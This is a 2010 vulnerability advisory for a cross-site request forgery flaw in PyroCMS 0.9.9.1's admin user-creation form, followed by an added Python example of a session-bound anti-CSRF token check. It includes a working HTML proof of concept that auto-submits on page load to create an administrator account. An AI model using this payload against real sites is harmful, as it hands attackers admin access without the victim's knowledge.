Software: PyroCMS 0.9.9.1
Vulnerability: Cross-site Request Forgery
Tested On: Windows Vista + XAMPP
Date: 7/7/2010
Description
The admin user-creation form in PyroCMS 0.9.9.1 (index.php/admin/users/create) accepts a POST without any anti-CSRF token. A logged-in administrator who loads an attacker-controlled page therefore has a new account in the admin group created in their name, without any interaction beyond visiting the page.
Proof of Concept
<!-- Auto-submits a cross-site POST to the admin user-creation endpoint; it only succeeds if the visiting browser carries a valid PyroCMS admin session -->
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
            <input type="hidden" name="first_name" value="a" />
            <input type="hidden" name="last_name" value="a" />
            <input type="hidden" name="email" value="new_admin@x.com" />
            <input type="hidden" name="username" value="new_admin" />
            <input type="hidden" name="display_name" value="a" />
            <input type="hidden" name="group" value="admin" />
            <input type="hidden" name="active" value="1" />
            <input type="hidden" name="password" value="Password1" />
            <input type="hidden" name="confirm_password" value="Password1" />
            <input type="hidden" name="btnAction" value="save" />
        </form>
    </body>
</html>
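The fix this advisory implies, as an added example that is not PyroCMS code: a minimal synchronizer-token check written in Python, using a hypothetical Session class. The vulnerable handler accepts any authenticated POST (the 0.9.9.1 behaviour); the hardened one rejects a body that lacks the token bound to the victim's session, which a third-party page cannot read. The forged body below is constructed to mirror the PoC's hidden fields.

```python
import hmac
import secrets

# Endpoint the PoC targets (from the advisory).
CREATE_USER_PATH = "/index.php/admin/users/create"

# Constructed sample: the POST body the PoC's auto-submitted form sends.
FORGED_POST = {
    "first_name": "a", "last_name": "a", "email": "new_admin@x.com",
    "username": "new_admin", "display_name": "a", "group": "admin",
    "active": "1", "password": "Password1", "confirm_password": "Password1",
    "btnAction": "save",
}


class Session:
    """Hypothetical stand-in for a logged-in admin session (not PyroCMS code)."""

    def __init__(self):
        # One unguessable token per session, issued server-side.
        self.csrf_token = secrets.token_hex(32)


def render_create_user_form(session):
    """Hardened form: the server embeds the session's token as a hidden field."""
    return {"csrf_token": session.csrf_token}


def legitimate_post(session):
    """A submission from the real admin page, carrying the embedded token."""
    return {**FORGED_POST, **render_create_user_form(session)}


def handle_create_user_vulnerable(session, post):
    """Mirrors 0.9.9.1: any POST from an authenticated browser is accepted."""
    return {"created": post["username"], "group": post["group"]}


def handle_create_user_hardened(session, post):
    """Accepts the POST only if it carries the token tied to this session.

    Comparison is constant-time; the token is compared as bytes so a non-ASCII
    value supplied by a client is rejected rather than raising."""
    supplied = str(post.get("csrf_token", "")).encode()
    expected = session.csrf_token.encode()
    if not hmac.compare_digest(supplied, expected):
        return None  # reject: token missing or wrong
    return {"created": post["username"], "group": post["group"]}
```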